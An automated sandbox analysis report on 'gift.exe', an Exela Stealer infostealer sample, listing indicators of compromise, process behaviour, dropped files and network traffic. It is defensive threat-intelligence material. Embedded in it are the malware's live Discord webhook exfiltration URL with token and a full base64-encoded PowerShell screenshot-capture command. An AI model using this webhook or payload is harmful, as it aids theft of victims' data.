File name:

gift.exe

Full analysis: https://app.any.run/tasks/97343352-82c8-4613-a929-32b14ffd91af
Verdict: Malicious activity
Threats:

Exela Stealer is an infostealer malware written in Python. It is capable of collecting a wide range of sensitive information from compromised systems and exfiltrating it to attackers over Discord. It is frequently used to steal browser data, and obtain session files from various applications, including gaming platforms, social media platforms, and messaging apps.

Malware Trends Tracker     >>>
Analysis date: May 02, 2025, 19:57:00
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
evasion
stealer
python
exela
auto-reg
screenshot
discord
pyinstaller
susp-powershell
ims-api
generic
growtopia
discordgrabber
upx
rust
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 7 sections
MD5:

9E9FBCA740832A80B8213AA9C79E6FEA

SHA1:

4A6D2B59AB69585E079E3F2D9A55CACA3837FE7C

SHA256:

71AA720C8283C7704FD3F0F45E474B265FBDA7FDEA627B74B194C02381FCFEDC

SSDEEP:

98304:x1T2Q6kV4cUAOeW/OKeJqQKHH7bmY90GpJNSDaf87Yfd6ackYShtHfktEzafhOsr:cTmEkrYSqXONx6YWRUFYZg6+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes the autorun value in the registry

      • reg.exe (PID: 2040)

    • Steals credentials from Web Browsers

      • gift.exe (PID: 728)

    • Actions looks like stealing of personal data

      • gift.exe (PID: 728)

    • ExelaStealer has been detected

      • gift.exe (PID: 728)

    • Starts NET.EXE to view/add/change user profiles

      • cmd.exe (PID: 1228)
      • net.exe (PID: 5324)
      • net.exe (PID: 1628)
      • net.exe (PID: 2316)

    • Starts NET.EXE to view/change users localgroup

      • net.exe (PID: 6564)
      • cmd.exe (PID: 1228)
      • net.exe (PID: 5056)

    • DISCORDGRABBER has been detected (YARA)

      • gift.exe (PID: 728)

    • GROWTOPIA has been detected (YARA)

      • gift.exe (PID: 728)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 2560)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 1012)

  • SUSPICIOUS

    • Process drops legitimate windows executable

      • gift.exe (PID: 6620)
      • gift.exe (PID: 728)
      • Exela.exe (PID: 5048)

    • Process drops python dynamic module

      • gift.exe (PID: 6620)
      • Exela.exe (PID: 5048)

    • Starts a Microsoft application from unusual location

      • gift.exe (PID: 6620)
      • gift.exe (PID: 728)

    • Executable content was dropped or overwritten

      • gift.exe (PID: 6620)
      • gift.exe (PID: 728)
      • Exela.exe (PID: 5048)
      • csc.exe (PID: 2552)

    • The process drops C-runtime libraries

      • gift.exe (PID: 6620)
      • Exela.exe (PID: 5048)

    • Application launched itself

      • gift.exe (PID: 6620)
      • cmd.exe (PID: 5608)
      • cmd.exe (PID: 5260)
      • Exela.exe (PID: 5048)

    • Loads Python modules

      • gift.exe (PID: 728)
      • Exela.exe (PID: 6752)

    • Uses WMIC.EXE to obtain a list of video controllers

      • cmd.exe (PID: 4040)

    • Starts CMD.EXE for commands execution

      • gift.exe (PID: 728)
      • cmd.exe (PID: 5608)
      • Exela.exe (PID: 6752)
      • cmd.exe (PID: 5260)

    • Uses WMIC.EXE to obtain computer system information

      • cmd.exe (PID: 6516)
      • cmd.exe (PID: 6592)

    • Get information on the list of running processes

      • cmd.exe (PID: 4976)
      • cmd.exe (PID: 5048)
      • gift.exe (PID: 728)
      • cmd.exe (PID: 3100)
      • cmd.exe (PID: 6148)
      • cmd.exe (PID: 1228)

    • Accesses video controller name via WMI (SCRIPT)

      • WMIC.exe (PID: 5728)

    • Uses WMIC.EXE to obtain Windows Installer data

      • cmd.exe (PID: 6724)
      • cmd.exe (PID: 6240)
      • cmd.exe (PID: 5116)

    • Accesses product unique identifier via WMI (SCRIPT)

      • WMIC.exe (PID: 5260)
      • WMIC.exe (PID: 2108)
      • WMIC.exe (PID: 4272)

    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 7052)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 5596)

    • Executes JavaScript directly as a command

      • cmd.exe (PID: 4300)

    • Starts application with an unusual extension

      • cmd.exe (PID: 5728)
      • cmd.exe (PID: 864)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6564)
      • cmd.exe (PID: 1012)

    • Uses SYSTEMINFO.EXE to read the environment

      • cmd.exe (PID: 1228)

    • Uses NETSH.EXE to obtain data on the network

      • cmd.exe (PID: 1184)

    • Checks for external IP

      • svchost.exe (PID: 2196)
      • gift.exe (PID: 728)

    • Uses WMIC.EXE to obtain local storage devices information

      • cmd.exe (PID: 1228)

    • Uses QUSER.EXE to read information about current user sessions

      • query.exe (PID: 5124)

    • Uses WMIC.EXE to obtain commands that are run when users log in

      • cmd.exe (PID: 1228)

    • Possible usage of Discord/Telegram API has been detected (YARA)

      • gift.exe (PID: 728)

    • Process uses ARP to discover network configuration

      • cmd.exe (PID: 1228)

    • Multiple wallet extension IDs have been found

      • gift.exe (PID: 728)

    • Windows service management via SC.EXE

      • sc.exe (PID: 896)

    • Process uses IPCONFIG to discover network configuration

      • cmd.exe (PID: 1228)

    • Uses ROUTE.EXE to obtain the routing table information

      • cmd.exe (PID: 1228)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 1012)

    • BASE64 encoded PowerShell command has been detected

      • cmd.exe (PID: 1012)

    • Suspicious use of NETSH.EXE

      • cmd.exe (PID: 1228)

    • Starts SC.EXE for service management

      • cmd.exe (PID: 1228)

    • Base64-obfuscated command line is found

      • cmd.exe (PID: 1012)

    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 2552)

    • Captures screenshot (POWERSHELL)

      • powershell.exe (PID: 2560)

  • INFO

    • Checks supported languages

      • gift.exe (PID: 6620)
      • gift.exe (PID: 728)
      • chcp.com (PID: 4988)
      • Exela.exe (PID: 5048)
      • chcp.com (PID: 516)
      • Exela.exe (PID: 6752)
      • csc.exe (PID: 2552)
      • cvtres.exe (PID: 6740)

    • Reads the computer name

      • gift.exe (PID: 6620)
      • gift.exe (PID: 728)
      • Exela.exe (PID: 5048)

    • The sample compiled with english language support

      • gift.exe (PID: 6620)
      • gift.exe (PID: 728)
      • Exela.exe (PID: 5048)

    • Create files in a temporary directory

      • gift.exe (PID: 6620)
      • gift.exe (PID: 728)
      • Exela.exe (PID: 5048)
      • csc.exe (PID: 2552)
      • cvtres.exe (PID: 6740)

    • Reads security settings of Internet Explorer

      • WMIC.exe (PID: 4436)
      • WMIC.exe (PID: 5260)
      • WMIC.exe (PID: 5728)
      • WMIC.exe (PID: 5508)
      • WMIC.exe (PID: 2088)
      • WMIC.exe (PID: 6516)
      • WMIC.exe (PID: 2108)
      • WMIC.exe (PID: 4272)

    • Creates files or folders in the user directory

      • gift.exe (PID: 728)

    • Auto-launch of the file from Registry key

      • reg.exe (PID: 2040)

    • The Powershell gets current clipboard

      • powershell.exe (PID: 2904)

    • Changes the display of characters in the console

      • cmd.exe (PID: 5728)
      • cmd.exe (PID: 864)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 3140)

    • Manual execution by a user

      • Exela.exe (PID: 5048)

    • PyInstaller has been detected (YARA)

      • gift.exe (PID: 6620)
      • gift.exe (PID: 728)

    • Checks operating system version

      • gift.exe (PID: 728)
      • Exela.exe (PID: 6752)

    • Reads the time zone

      • net1.exe (PID: 1096)
      • net1.exe (PID: 1272)

    • Prints a route via ROUTE.EXE

      • ROUTE.EXE (PID: 1056)

    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • gift.exe (PID: 728)

    • Application based on Rust

      • gift.exe (PID: 728)

    • UPX packer has been detected

      • gift.exe (PID: 728)

    • Reads the machine GUID from the registry

      • csc.exe (PID: 2552)

    • Attempting to use instant messaging service

      • gift.exe (PID: 728)

    • Checks proxy server information

      • slui.exe (PID: 4120)

    • Reads the software policy settings

      • slui.exe (PID: 4120)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

ims-api

(PID) Process(728) gift.exe
Discord-Webhook-Tokens (1)1367948068078620743/n4O7h4A0a_n83UtKDS5mPu_JS4dCE5i3kVprsqsH-SVjClsxBZFJjBaDhV49V3WZ74iK
Discord-Info-Links
1367948068078620743/n4O7h4A0a_n83UtKDS5mPu_JS4dCE5i3kVprsqsH-SVjClsxBZFJjBaDhV49V3WZ74iK
Get Webhook Infohttps://discord.com/api/webhooks/1367948068078620743/n4O7h4A0a_n83UtKDS5mPu_JS4dCE5i3kVprsqsH-SVjClsxBZFJjBaDhV49V3WZ74iK
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2025:05:02 19:38:30+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.42
CodeSize: 173568
InitializedDataSize: 95232
UninitializedDataSize: -
EntryPoint: 0xce20
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
FileVersionNumber: 10.0.19041.746
ProductVersionNumber: 10.0.19041.746
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Dynamic link library
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: Microsoft Corporation
FileDescription: Exela Services
FileVersion: 10.0.19041.746 (WinBuild.160101.0800)
InternalName: Exela.exe
LegalCopyright: © Microsoft Corporation. All rights reserved.
OriginalFileName: Exela.exe
ProductName: Microsoft® Windows® Operating System
ProductVersion: 10.0.19041.746
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
222
Monitored processes
97
Malicious processes
4
Suspicious processes
4

Behavior graph

Click at the process to see the details
start gift.exe #EXELASTEALER gift.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs wmic.exe no specs wmic.exe no specs tasklist.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs tasklist.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs attrib.exe no specs cmd.exe no specs conhost.exe no specs reg.exe cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs mshta.exe no specs tasklist.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs tasklist.exe no specs cmd.exe no specs chcp.com no specs powershell.exe no specs chcp.com no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs netsh.exe no specs systeminfo.exe no specs svchost.exe tiworker.exe no specs exela.exe hostname.exe no specs wmic.exe no specs net.exe no specs net1.exe no specs exela.exe no specs query.exe no specs quser.exe no specs net.exe no specs net1.exe no specs net.exe no specs net1.exe no specs net.exe no specs net1.exe no specs net.exe no specs net1.exe no specs wmic.exe no specs tasklist.exe no specs ipconfig.exe no specs route.exe no specs cmd.exe no specs conhost.exe no specs arp.exe no specs netstat.exe no specs sc.exe no specs netsh.exe no specs netsh.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
516chcpC:\Windows\System32\chcp.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Change CodePage Utility
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
536arp -a C:\Windows\System32\ARP.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Arp Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
728"C:\Users\admin\Desktop\gift.exe" C:\Users\admin\Desktop\gift.exe
gift.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Exela Services
Exit code:
0
Version:
10.0.19041.746 (WinBuild.160101.0800)
ims-api
(PID) Process(728) gift.exe
Discord-Webhook-Tokens (1)1367948068078620743/n4O7h4A0a_n83UtKDS5mPu_JS4dCE5i3kVprsqsH-SVjClsxBZFJjBaDhV49V3WZ74iK
Discord-Info-Links
1367948068078620743/n4O7h4A0a_n83UtKDS5mPu_JS4dCE5i3kVprsqsH-SVjClsxBZFJjBaDhV49V3WZ74iK
Get Webhook Infohttps://discord.com/api/webhooks/1367948068078620743/n4O7h4A0a_n83UtKDS5mPu_JS4dCE5i3kVprsqsH-SVjClsxBZFJjBaDhV49V3WZ74iK
864\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
864cmd.exe /c chcpC:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
896sc query type= service state= all C:\Windows\System32\sc.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Service Control Manager Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
1012C:\WINDOWS\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="C:\Windows\System32\cmd.exegift.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
1056route print C:\Windows\System32\ROUTE.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Route Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
1096hostname C:\Windows\System32\HOSTNAME.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Hostname APP
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
1096C:\WINDOWS\system32\net1 user guest C:\Windows\System32\net1.exenet.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Net Command
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Total events
0
Read events
0
Write events
0
Delete events
0

Modification events

No data
Executable files
146
Suspicious files
37
Text files
40
Unknown types
0

Dropped files

PID
Process
Filename
Type
6620gift.exeC:\Users\admin\AppData\Local\Temp\_MEI66202\_asyncio.pydexecutable
MD5:1B8CE772A230A5DA8CBDCCD8914080A5
SHA256:FA5A1E7031DE5849AB2AB5A177E366B41E1DF6BBD90C8D2418033A01C740771F
6620gift.exeC:\Users\admin\AppData\Local\Temp\_MEI66202\aiohttp\_http_parser.cp311-win_amd64.pydexecutable
MD5:1676378A79219E806646D6EFA2591522
SHA256:74A8D2CFA1B69C72A339A246EA2F92FD2E55B226CDA905C9EA50169DBB840710
6620gift.exeC:\Users\admin\AppData\Local\Temp\_MEI66202\VCRUNTIME140.dllexecutable
MD5:F12681A472B9DD04A812E16096514974
SHA256:D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
6620gift.exeC:\Users\admin\AppData\Local\Temp\_MEI66202\_bz2.pydexecutable
MD5:80C69A1D87F0C82D6C4268E5A8213B78
SHA256:307359F1B2552B60839385EB63D74CBFE75CD5EFDB4E7CD0BB7D296FA67D8A87
6620gift.exeC:\Users\admin\AppData\Local\Temp\_MEI66202\_overlapped.pydexecutable
MD5:97A40F53A81C39469CC7C8DD00F51B5D
SHA256:11879A429C996FEE8BE891AF2BEC7D00F966593F1E01CA0A60BD2005FEB4176F
6620gift.exeC:\Users\admin\AppData\Local\Temp\_MEI66202\_hashlib.pydexecutable
MD5:0629BDB5FF24CE5E88A2DDCEDE608AEE
SHA256:F404BB8371618BBD782201F092A3BCD7A96D3C143787EBEA1D8D86DED1F4B3B8
6620gift.exeC:\Users\admin\AppData\Local\Temp\_MEI66202\_decimal.pydexecutable
MD5:E9501519A447B13DCCA19E09140C9E84
SHA256:6B5FE2DEA13B84E40B0278D1702AA29E9E2091F9DC09B64BBFF5FD419A604C3C
6620gift.exeC:\Users\admin\AppData\Local\Temp\_MEI66202\_ctypes.pydexecutable
MD5:B4C41A4A46E1D08206C109CE547480C7
SHA256:9925AB71A4D74CE0CCC036034D422782395DD496472BD2D7B6D617F4D6DDC1F9
6620gift.exeC:\Users\admin\AppData\Local\Temp\_MEI66202\_lzma.pydexecutable
MD5:BFCA96ED7647B31DD2919BEDEBB856B8
SHA256:032B1A139ADCFF84426B6E156F9987B501AD42ECFB18170B10FB54DA0157392E
6620gift.exeC:\Users\admin\AppData\Local\Temp\_MEI66202\_multiprocessing.pydexecutable
MD5:849B4203C5F9092DB9022732D8247C97
SHA256:45BFBAB1D2373CF7A8AF19E5887579B8A306B3AD0C4F57E8F666339177F1F807
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
41
TCP/UDP connections
60
DNS requests
22
Threats
18

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2104
svchost.exe
GET
200
23.48.23.193:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
2104
svchost.exe
GET
200
2.16.253.202:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
728
gift.exe
GET
200
208.95.112.1:80
http://ip-api.com/json
unknown
whitelisted
1196
SIHClient.exe
GET
200
23.48.23.194:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl
unknown
whitelisted
1196
SIHClient.exe
GET
200
2.16.253.202:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl
unknown
whitelisted
1196
SIHClient.exe
GET
200
23.48.23.194:80
http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl
unknown
whitelisted
POST
400
20.190.160.64:443
https://login.live.com/ppsecure/deviceaddcredential.srf
unknown
text
203 b
whitelisted
POST
400
40.126.32.68:443
https://login.live.com/ppsecure/deviceaddcredential.srf
unknown
text
203 b
whitelisted
POST
400
20.190.160.4:443
https://login.live.com/ppsecure/deviceaddcredential.srf
unknown
text
203 b
whitelisted
POST
400
40.126.32.140:443
https://login.live.com/ppsecure/deviceaddcredential.srf
unknown
text
203 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
2104
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
20.190.159.64:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6544
svchost.exe
20.190.159.64:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2112
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2104
svchost.exe
23.48.23.193:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2104
svchost.exe
2.16.253.202:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 4.231.128.59
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted
login.live.com
  • 20.190.159.64
  • 40.126.31.71
  • 20.190.159.75
  • 40.126.31.3
  • 20.190.159.23
  • 40.126.31.131
  • 40.126.31.2
  • 40.126.31.69
whitelisted
google.com
  • 142.250.185.238
whitelisted
crl.microsoft.com
  • 23.48.23.193
  • 23.48.23.139
  • 23.48.23.190
  • 23.48.23.140
  • 23.48.23.191
  • 23.48.23.194
  • 23.48.23.183
  • 23.48.23.138
  • 23.48.23.192
  • 23.48.23.177
  • 23.48.23.146
  • 23.48.23.188
  • 23.48.23.185
whitelisted
www.microsoft.com
  • 2.16.253.202
whitelisted
ip-api.com
  • 208.95.112.1
whitelisted
discord.com
  • 162.159.137.232
  • 162.159.136.232
  • 162.159.135.232
  • 162.159.128.233
  • 162.159.138.232
whitelisted
slscr.update.microsoft.com
  • 52.149.20.212
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.3.187.198
whitelisted

Threats

PID
Process
Class
Message
728
gift.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup ip-api.com
2196
svchost.exe
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Check (ip-api .com)
2196
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
2196
svchost.exe
Misc activity
ET INFO Observed Discord Domain in DNS Lookup (discord .com)
728
gift.exe
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
2196
svchost.exe
Misc activity
ET INFO Discord Chat Service Domain in DNS Lookup (discord .com)
728
gift.exe
Misc activity
ET INFO Observed Discord Service Domain (discord .com) in TLS SNI
Misc activity
ET HUNTING Discord WebHook Activity M2 (Contains Key, embeds)
728
gift.exe
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
728
gift.exe
Misc activity
ET INFO Observed Discord Service Domain (discord .com) in TLS SNI
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
gift.exe